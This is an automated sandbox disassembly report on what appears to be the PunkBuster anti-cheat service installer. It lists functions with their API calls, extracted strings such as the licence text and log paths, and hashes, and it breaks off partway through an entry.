                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: $I &Agree$I &Disagree$PunkBuster End User License Agreement$SOFTWARE LICENSE AGREEMENTThe terms of this Software License Agreement (this "Agreement") shall apply to all versions, editions, and future updates of PunkBuster software and constitute a legal agreement between you (the "Licensee") and Even Balance, Inc. (t$button$dialog$n$text
                                              • API String ID: 3519838083-3872559604
                                              • Opcode ID: 33d5fe19a2b34a0dc1b8605e66f3fe6fe93fc4ecdc2eb80d450ec21c1a0649d0
                                              • Instruction ID: 241a5a671ada6123a631bfefd5bb6ca2289978ba863265d408999d36451ca270
                                              • Opcode Fuzzy Hash: 33d5fe19a2b34a0dc1b8605e66f3fe6fe93fc4ecdc2eb80d450ec21c1a0649d0
                                              • Instruction Fuzzy Hash: 8DA1AF70D00349EAEB05DFA4CC45BEEBBB4AF05308F10852EE551B62E1DBB81B48CB59
                                              Function 004C3E93 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 115COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,0050F7E8,00000118,004BC183,00000001,00000000,0050ED98,00000008,004C6487,00000000,00000000,00000000), ref: 004C3F14
                                              • _strlen.LIBCMT ref: 004C3F3A
                                              • _strlen.LIBCMT ref: 004C3F4B
                                              • _strlen.LIBCMT ref: 004C3F6E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _strlen$FileModuleName
                                              • String ID: ...$<program name unknown>$Buffer overrun detected!$Microsoft Visual C++ Runtime Library$Program: $Unknown security failure detected!
                                              • API String ID: 1637341245-1673886896
                                              • Opcode ID: 69a06e9b40fbf20122ab49d451b4c53a99b7e7dd79e971efd0f63ee4cc165297
                                              • Instruction ID: b9b3d884a23d04d5a9ae845288b9d500708d593b82c7f80a618a4aa3ed5d7893
                                              • Opcode Fuzzy Hash: 69a06e9b40fbf20122ab49d451b4c53a99b7e7dd79e971efd0f63ee4cc165297
                                              • Instruction Fuzzy Hash: 4131C671D40218ABDB10AF658C87FDE7AB4EF04718F10445FF411AA1C2DB7C9B518BAA
                                              Function 004387D0 Relevance: 16.6, APIs: 11, Instructions: 84COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetObjectA.GDI32(?,00000018,?), ref: 004387F8
                                              • 73A14C40.GDI32(00000000,00000000,?,?,?,?,?,?), ref: 00438819
                                              • 73A14C40.GDI32(00000000,?,?,?,?,?,?), ref: 0043881F
                                              • 73A16180.GDI32(?,?,00000001,00000001,00000000,?,?,?,?,?,?), ref: 00438833
                                              • SelectObject.GDI32(00000000,?), ref: 00438843
                                              • SelectObject.GDI32(00000000,00000000), ref: 0043884B
                                              • 73A14D40.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00330008,?,?,?,?,?,?), ref: 0043886A
                                              • SelectObject.GDI32(00000000,?), ref: 00438876
                                              • SelectObject.GDI32(00000000,?), ref: 0043887E
                                              • DeleteDC.GDI32(00000000), ref: 00438887
                                              • DeleteDC.GDI32(00000000), ref: 0043888A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Object$Select$Delete$A16180
                                              • String ID:
                                              • API String ID: 518046551-0
                                              • Opcode ID: 3c81d8e50dfcbfe49c593cb458a6f868211e41e6d112929c436eba2b5acf46bf
                                              • Instruction ID: 7984cc7a5a7bcc0b52638dd99ff42acabcd130bd69c8778fa69ada57451c190c
                                              • Opcode Fuzzy Hash: 3c81d8e50dfcbfe49c593cb458a6f868211e41e6d112929c436eba2b5acf46bf
                                              • Instruction Fuzzy Hash: 71214A71644340ABD210EB698CC0F6BBBE8EBCDB50F44092DF648972A1D675E8008B66
                                              Function 004076BA Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 004076BF
                                              • GetSystemDirectoryA.KERNEL32(?,00000400), ref: 004076F9
                                              • _strncat.LIBCMT ref: 0040770C
                                              • _strncat.LIBCMT ref: 00407786
                                              • _strncat.LIBCMT ref: 004077FB
                                                • Part of subcall function 00406B6C: _strlen.LIBCMT ref: 00406B78
                                                • Part of subcall function 00406AE7: __EH_prolog.LIBCMT ref: 00406AEC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _strncat$H_prolog$DirectorySystem_strlen
                                              • String ID: Courier New$\LogFiles$\PunkBuster$\pbsvc.log
                                              • API String ID: 666638376-3571523793
                                              • Opcode ID: ece0d52ea7ba4d625339ed649b6e816857d466a14f5f7f22f28f37991c993d12
                                              • Instruction ID: 26f8c4236d45206483bf339da4866ef4be8d7202687d2feb97467a2a947cf969
                                              • Opcode Fuzzy Hash: ece0d52ea7ba4d625339ed649b6e816857d466a14f5f7f22f28f37991c993d12
                                              • Instruction Fuzzy Hash: FF5182B280115CAACB14EBA5DD85BDD77BC9F15304F1080BFE909A71C2DB385B89CB69
                                              Function 0042B120 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 239windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0042AC50: LoadLibraryA.KERNEL32(?,?,0042B213,00000000), ref: 0042AC74
                                              • SendMessageA.USER32(?,0000045B,00000001,00000000), ref: 0042B395
                                              • SendMessageA.USER32(?,00000445,00000000,00000001), ref: 0042B3A6
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037,FFFFFFFF,00000000,?,?,?,000000FF,?), ref: 0042B3BB
                                              Strings
                                              • RichEdit20A, xrefs: 0042B1EA
                                              • RICHEDIT, xrefs: 0042B21A
                                              • RICHEDIT50W, xrefs: 0042B1CC
                                              • Impossible to create a rich edit control, using simple text control instead. Please reinstall riched32.dll, xrefs: 0042B234
                                              • EDIT, xrefs: 0042B15D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MessageSend$LibraryLoadWindow
                                              • String ID: EDIT$Impossible to create a rich edit control, using simple text control instead. Please reinstall riched32.dll$RICHEDIT$RICHEDIT50W$RichEdit20A
                                              • API String ID: 3695014736-220143130
                                              • Opcode ID: 4bb688596893958bd9d614b47f0125ef2eb3f465bd2d6de7e778d3cc8adcd05b
                                              • Instruction ID: fd1f3e6eab14dd8ec65f4d08ef4d7de20f72b4bfebd2e21d27a059feec06a27f
                                              • Opcode Fuzzy Hash: 4bb688596893958bd9d614b47f0125ef2eb3f465bd2d6de7e778d3cc8adcd05b
                                              • Instruction Fuzzy Hash: B08102702047508BD310DF28E845BAFB7A0FF95368F540B5EF5A5973D2C778A8058BAA
                                              Function 00407F0C Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 167COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetSystemDirectoryA.KERNEL32(?,00000400), ref: 00408012
                                              • _strncat.LIBCMT ref: 00408025
                                                • Part of subcall function 004070CD: __EH_prolog.LIBCMT ref: 004070D2
                                                • Part of subcall function 004076BA: __EH_prolog.LIBCMT ref: 004076BF
                                                • Part of subcall function 004076BA: GetSystemDirectoryA.KERNEL32(?,00000400), ref: 004076F9
                                                • Part of subcall function 004076BA: _strncat.LIBCMT ref: 0040770C
                                                • Part of subcall function 004076BA: _strncat.LIBCMT ref: 00407786
                                                • Part of subcall function 00407E0F: __EH_prolog.LIBCMT ref: 00407E14
                                                • Part of subcall function 0040D2B8: __EH_prolog.LIBCMT ref: 0040D2BD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prolog$_strncat$DirectorySystem
                                              • String ID: %s %s$ PunkBuster DLL Install Files Included$32-bit$64-bit$Starting PunkBuster Service Installer (v%d.%d) (%s)$\LogFiles\PunkBuster\pbsvc.log
                                              • API String ID: 1593959897-659667646
                                              • Opcode ID: d1c17a080f57daa9b324116a8c7c3789a7d1ba216c9fe5bd63ab5f575e2b63dd
                                              • Instruction ID: c8cbcd95914244e00445ad1739eb842854e526158c222c1c77cc694d2deaaf9e
                                              • Opcode Fuzzy Hash: d1c17a080f57daa9b324116a8c7c3789a7d1ba216c9fe5bd63ab5f575e2b63dd
                                              • Instruction Fuzzy Hash: FE51B3B1900208AEDB14EB65DC85BDD77B9AF04318F1041FEF209A71D2DB795A85CF58
                                              Function 00494420 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 282COMMON
                                              Download Yara Rule
                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00494477
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: !$%02d$%03d$%04d$Courier New$L
                                              • API String ID: 885266447-3614883530
                                              • Opcode ID: 0c0297550bbf8ddfe022dab381adfa121dc131ff9338fba9037832900f50528e
                                              • Instruction ID: 60ab0369f6dd2dbcf4d7d1fdddb2370bc4fe2c9c9bfc25ac5e0f27450f90c011
                                              • Opcode Fuzzy Hash: 0c0297550bbf8ddfe022dab381adfa121dc131ff9338fba9037832900f50528e
                                              • Instruction Fuzzy Hash: AEB1D5701083809FD725DF28C840BAFBBE0AFC5714F244A6EF59987391D7799846CB9A
                                              Function 00402104 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 237COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00402109
                                                • Part of subcall function 004016A9: __EH_prolog.LIBCMT ref: 004016AE
                                                • Part of subcall function 004015D3: __EH_prolog.LIBCMT ref: 004015D8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: $Copy$PunkBuster Services Test$button$dialog$text
                                              • API String ID: 3519838083-3589454768
                                              • Opcode ID: 76b5a08b1cfa5c7d5fbc7861b65c1533f7a228ccc7332dff63859a40f55cd7ea
                                              • Instruction ID: ed48d589d5e5facd202ec40a79dd8d9ece5d7fb634fdabafeb78919855fc2bc3
                                              • Opcode Fuzzy Hash: 76b5a08b1cfa5c7d5fbc7861b65c1533f7a228ccc7332dff63859a40f55cd7ea
                                              • Instruction Fuzzy Hash: 14A19E71D00249EEEB05DFA4CC49BEEBBB8AF04308F10856EE551B62D1DBB85A44CB65
                                              Function 004241D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 187windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateDialogIndirectParamA.USER32(00000000,?,?,004B4820,00000000), ref: 00424232
                                              • SetWindowLongA.USER32(?,000000EC,?), ref: 00424285
                                              • SetWindowPos.USER32(?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00424576,00000000,?,?), ref: 004242B2
                                              • SendMessageA.USER32(?,00000080,00000001,?), ref: 0042433C
                                              • MoveWindow.USER32(?,?,?,00000000,?,00000000,?,?,?,?,?,?), ref: 004243CC
                                              • SetWindowTextA.USER32(?,00000000), ref: 004243E7
                                              Strings
                                              • Can't create dialog using memory template, xrefs: 00424242
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Window$CreateDialogIndirectLongMessageMoveParamSendText
                                              • String ID: Can't create dialog using memory template
                                              • API String ID: 3198842173-1473080150
                                              • Opcode ID: 842f8139567f96003f6765ed8ac3f988ef3293f25dd77c38576921955f773a03
                                              • Instruction ID: bca2413309c077372c06934a87c6b1bb22e49cf21180dde4032647e8baf410af
                                              • Opcode Fuzzy Hash: 842f8139567f96003f6765ed8ac3f988ef3293f25dd77c38576921955f773a03
                                              • Instruction Fuzzy Hash: D9614A753042019FC308CF65D885FABB7E9EFC8744F14462EF99A87291DB34E9058B6A
                                              Function 0040649F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 152memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
